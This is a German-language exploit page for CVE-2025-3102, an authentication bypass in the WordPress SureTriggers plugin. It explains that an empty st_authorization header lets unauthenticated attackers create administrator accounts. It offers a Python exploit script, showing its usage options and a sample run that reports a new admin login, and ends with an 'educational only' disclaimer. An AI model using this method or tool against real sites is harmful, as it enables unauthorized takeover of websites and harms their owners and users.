
Wordpress SureTriggers <= 1.0.78 - Autorisierungsumgehung aufgrund fehlender Leerwertprüfung zur nicht authentifizierten Erstellung administrativer Benutzer
🚨 CVE-2025-3102 ist eine kritische Authentifizierungs-Bypass-Schwachstelle, die das WordPress-Plugin SureTriggers: All-in-One Automation Platform betrifft, das auf über 100.000 Websites aktiv installiert ist. Aufgrund der Art des Fehlers und des Umfangs der Bereitstellung stellt diese Schwachstelle ein erhebliches Sicherheitsrisiko dar.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HDas SureTriggers-Plugin für WordPress ist anfällig für einen Authentifizierungs-Bypass, der es nicht authentifizierten Angreifern ermöglicht, Administrator-Konten zu erstellen. Dies ist auf eine fehlende Prüfung auf leere Werte des secret_key in der Funktion autheticate_user zurückzuführen.
Wenn das Plugin installiert und aktiviert, aber nicht mit einem API-Schlüssel konfiguriert ist, können Angreifer die Authentifizierung umgehen, indem sie einen leeren st_authorization-Header senden und so Aktionen auslösen, die authentifizierten Benutzern vorbehalten sind.
Ein Python-Skript wird bereitgestellt, um die Ausnutzung dieser Schwachstelle zu automatisieren.
Dieses Skript ermöglicht es Ihnen, auf verwundbaren Websites einen neuen Admin-Benutzer zu erstellen.
readme.txtst_authorization-Headersusage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: rHz0d
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
Dieses Skript wird nur für Bildungszwecke bereitgestellt.
Die unbefugte Verwendung dieses Codes gegen Ziele ohne ausdrückliche Genehmigung ist illegal.
Der Autor übernimmt keine Haftung für Missbrauch oder verursachte Schäden.
Von: rHz0d